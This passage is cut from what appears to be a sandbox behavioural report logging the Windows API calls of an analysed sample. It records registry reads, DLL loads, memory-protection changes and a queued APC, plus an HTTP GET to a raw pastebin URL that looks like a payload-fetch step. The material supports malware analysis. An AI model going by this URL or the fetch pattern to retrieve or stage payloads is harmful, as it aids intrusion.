            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "3408",
            "caller": "0x7ffed8a7c1c1",
            "parentcaller": "0x7ffed8a7c28f",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000003b8"
              },
              {
                "name": "SubKey",
                "value": "TenantRestrictions\\Payload"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x00000010",
                "pretty_value": "KEY_NOTIFY"
              },
              {
                "name": "Handle",
                "value": "0x000003c8"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1152
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "3408",
            "caller": "0x7ffed8a7c3f0",
            "parentcaller": "0x7ffed8a7c331",
            "category": "registry",
            "api": "RegNotifyChangeKeyValue",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload\\"
              },
              {
                "name": "NotifyFilter",
                "value": "0x10000004"
              },
              {
                "name": "WatchSubtree",
                "value": "1"
              },
              {
                "name": "Asynchronous",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 1153
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpSetOption",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x00963700"
              },
              {
                "name": "Option",
                "value": "0x00000044"
              },
              {
                "name": "Buffer",
                "value": "\\xe9\\xfd\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1154
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpSetOption",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x00963700"
              },
              {
                "name": "Option",
                "value": "0x00000058"
              },
              {
                "name": "Buffer",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1155
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpSetOption",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x00963700"
              },
              {
                "name": "Option",
                "value": "0x00000053"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x00 "
              }
            ],
            "repeated": 0,
            "id": 1156
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "3408",
            "caller": "0x7ffed8a7c1c1",
            "parentcaller": "0x7ffed8a7c791",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "Access",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "Handle",
                "value": "0x000003d0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1157
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "3408",
            "caller": "0x7ffed8a7c7eb",
            "parentcaller": "0x7ffed8a7b569",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x000003d0"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "0"
              },
              {
                "name": "MaxValueNameLength",
                "value": "0"
              },
              {
                "name": "MaxValueLength",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 1158
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "3408",
            "caller": "0x7ffed8a7c832",
            "parentcaller": "0x7ffed8a7b569",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000003d0"
              }
            ],
            "repeated": 0,
            "id": 1159
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpConnect",
            "status": true,
            "return": "0x00976830",
            "arguments": [
              {
                "name": "SessionHandle",
                "value": "0x00963700"
              },
              {
                "name": "ServerName",
                "value": "pastebin.com"
              },
              {
                "name": "ServerPort",
                "value": "443"
              }
            ],
            "repeated": 0,
            "id": 1160
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpOpenRequest",
            "status": true,
            "return": "0x009769d0",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x00976830"
              },
              {
                "name": "Verb",
                "value": "GET"
              },
              {
                "name": "ObjectName",
                "value": "/raw/04TKQkE1"
              },
              {
                "name": "Version",
                "value": "HTTP/1.1"
              },
              {
                "name": "Referrer",
                "value": ""
              },
              {
                "name": "Flags",
                "value": "0x00800080"
              }
            ],
            "repeated": 0,
            "id": 1161
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpSetOption",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x009769d0"
              },
              {
                "name": "Option",
                "value": "0x0000004d"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1162
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpSetOption",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x009769d0"
              },
              {
                "name": "Option",
                "value": "0x00000059"
              },
              {
                "name": "Buffer",
                "value": "\n\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1163
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpSetOption",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x009769d0"
              },
              {
                "name": "Option",
                "value": "0x0000005b"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x01\\x00"
              }
            ],
            "repeated": 0,
            "id": 1164
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "network",
            "api": "WinHttpSetOption",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "InternetHandle",
                "value": "0x009769d0"
              },
              {
                "name": "Option",
                "value": "0x0000005c"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\xa0\\x0f\\x00"
              }
            ],
            "repeated": 0,
            "id": 1165
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\webio"
              },
              {
                "name": "DllBase",
                "value": "0x7ffec7790000"
              }
            ],
            "repeated": 0,
            "id": 1166
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\mswsock"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0260000"
              }
            ],
            "repeated": 0,
            "id": 1167
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtQuerySystemTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 2,
            "id": 1168
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\mswsock.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0260000"
              }
            ],
            "repeated": 0,
            "id": 1169
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\IPHLPAPI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedff50000"
              }
            ],
            "repeated": 0,
            "id": 1170
          },
          {
            "timestamp": "2025-11-20 10:58:34,000",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtQuerySystemTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 1,
            "id": 1171
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1172
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\NSI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee2110000"
              }
            ],
            "repeated": 0,
            "id": 1173
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "2188",
            "caller": "0x140084a74",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\WINNSI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedae00000"
              }
            ],
            "repeated": 0,
            "id": 1174
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee34b3f7a",
            "parentcaller": "0x7ffee3350ed7",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1175
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8b20000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1176
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8b20000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1177
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffed8a5ff36",
            "parentcaller": "0x7ffed8a5fde9",
            "category": "services",
            "api": "OpenSCManagerW",
            "status": true,
            "return": "0x0098ce90",
            "arguments": [
              {
                "name": "MachineName",
                "value": ""
              },
              {
                "name": "DatabaseName",
                "value": ""
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "SC_MANAGER_CONNECT"
              }
            ],
            "repeated": 0,
            "id": 1178
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffed8a5ff5e",
            "parentcaller": "0x7ffed8a5fde9",
            "category": "services",
            "api": "OpenServiceW",
            "status": true,
            "return": "0x0098d160",
            "arguments": [
              {
                "name": "ServiceControlManager",
                "value": "0x0098ce90"
              },
              {
                "name": "ServiceName",
                "value": "WinHttpAutoProxySvc"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000094",
                "pretty_value": "SERVICE_QUERY_STATUS|SERVICE_START|SERVICE_INTERROGATE"
              }
            ],
            "repeated": 0,
            "id": 1179
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8b20000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1180
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8b20000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1181
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee10bef9e",
            "parentcaller": "0x7ffee32a6d74",
            "category": "threading",
            "api": "NtOpenThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ThreadHandle",
                "value": "0x00000464"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100010",
                "pretty_value": "THREAD_SET_CONTEXT|0x00100000"
              },
              {
                "name": "ProcessId",
                "value": "3308"
              },
              {
                "name": "ThreadId",
                "value": "118879976"
              }
            ],
            "repeated": 0,
            "id": 1182
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee34b7830",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8b20000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1183
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee34b7881",
            "parentcaller": "0x7ffee34a20f9",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed8b20000"
              },
              {
                "name": "ModuleName",
                "value": "WINHTTP.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1184
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "1596",
            "caller": "0x7ffee32a6aa3",
            "parentcaller": "0x7ffee34d2dc9",
            "category": "threading",
            "api": "NtQueueApcThread",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessId",
                "value": "3308"
              },
              {
                "name": "ThreadId",
                "value": "3408"
              },
              {
                "name": "ThreadHandle",
                "value": "0x00000464"
              },
              {
                "name": "ApcRoutine",
                "value": "0x7ffee32aded0"
              },
              {
                "name": "Module",
                "value": "sechost.dll"
              }
            ],
            "repeated": 0,
            "id": 1185
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee10b30ce",
            "parentcaller": "0x7ffee32a8719",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1186
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee10b30ce",
            "parentcaller": "0x7ffee32a8719",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000464"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 1187
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee10db62e",
            "parentcaller": "0x7ffee32a8746",
            "category": "system",
            "api": "NtDelayExecution",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Milliseconds",
                "value": "250"
              }
            ],
            "repeated": 0,
            "id": 1188
          },
          {
            "timestamp": "2025-11-20 10:58:34,016",
            "thread_id": "3408",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffed8a5fe9f",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000460"
              }
            ],
            "repeated": 0,
            "id": 1189
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffee34b3f7a",
            "parentcaller": "0x7ffee3350ed7",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1190
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffee338bf07",
            "parentcaller": "0x7ffee338be66",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1191
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffee34b3f7a",
            "parentcaller": "0x7ffee3350ed7",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1192
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee10b30ce",
            "parentcaller": "0x7ffed8a50b26",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000460"
              },
              {
                "name": "Milliseconds",
                "value": "18446744073709551615"
              },
              {
                "name": "Status",
                "value": "Infinite"
              }
            ],
            "repeated": 0,
            "id": 1193
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee347c23a",
            "parentcaller": "0x7ffee347c30d",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000468"
              }
            ],
            "repeated": 0,
            "id": 1194
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee347c23a",
            "parentcaller": "0x7ffee347c30d",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000046c"
              }
            ],
            "repeated": 0,
            "id": 1195
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffed8a903e1",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000045c"
              }
            ],
            "repeated": 0,
            "id": 1196
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffed8a51ba7",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000458"
              }
            ],
            "repeated": 0,
            "id": 1197
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffed8a90fbf",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000460"
              }
            ],
            "repeated": 0,
            "id": 1198
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee347c23a",
            "parentcaller": "0x7ffee34c37ea",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000464"
              }
            ],
            "repeated": 0,
            "id": 1199
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05d43000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1200
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee22c2f9c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\mswsock.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0260000"
              }
            ],
            "repeated": 1,
            "id": 1201
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee22d00db",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\DNSAPI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedff90000"
              }
            ],
            "repeated": 0,
            "id": 1202
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffee34d7cc6",
            "parentcaller": "0x7ffee34addf7",
            "category": "system",
            "api": "NtQuerySystemTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 2,
            "id": 1203
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffee34d7cc6",
            "parentcaller": "0x7ffee34addf7",
            "category": "network",
            "api": "GetAddrInfoExW",
            "status": false,
            "return": "0x000003e5",
            "arguments": [
              {
                "name": "Name",
                "value": "pastebin.com"
              },
              {
                "name": "ServiceName",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1204
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "3408",
            "caller": "0x7ffedffac013",
            "parentcaller": "0x7ffedff9cb2c",
            "category": "registry",
            "api": "RegCreateKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
              },
              {
                "name": "Class",
                "value": "Class"
              },
              {
                "name": "Access",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "Handle",
                "value": "0x00000490"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
              },
              {
                "name": "Disposition",
                "value": "2",
                "pretty_value": "REG_OPENED_EXISTING_KEY"
              }
            ],
            "repeated": 0,
            "id": 1205
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x7ffee110026b",
            "parentcaller": "0x7ffee22cda6a",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000498"
              }
            ],
            "repeated": 0,
            "id": 1206
          },
          {
            "timestamp": "2025-11-20 10:58:34,031",
            "thread_id": "1596",
            "caller": "0x00000000",
            "parentcaller": "0x00000000",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
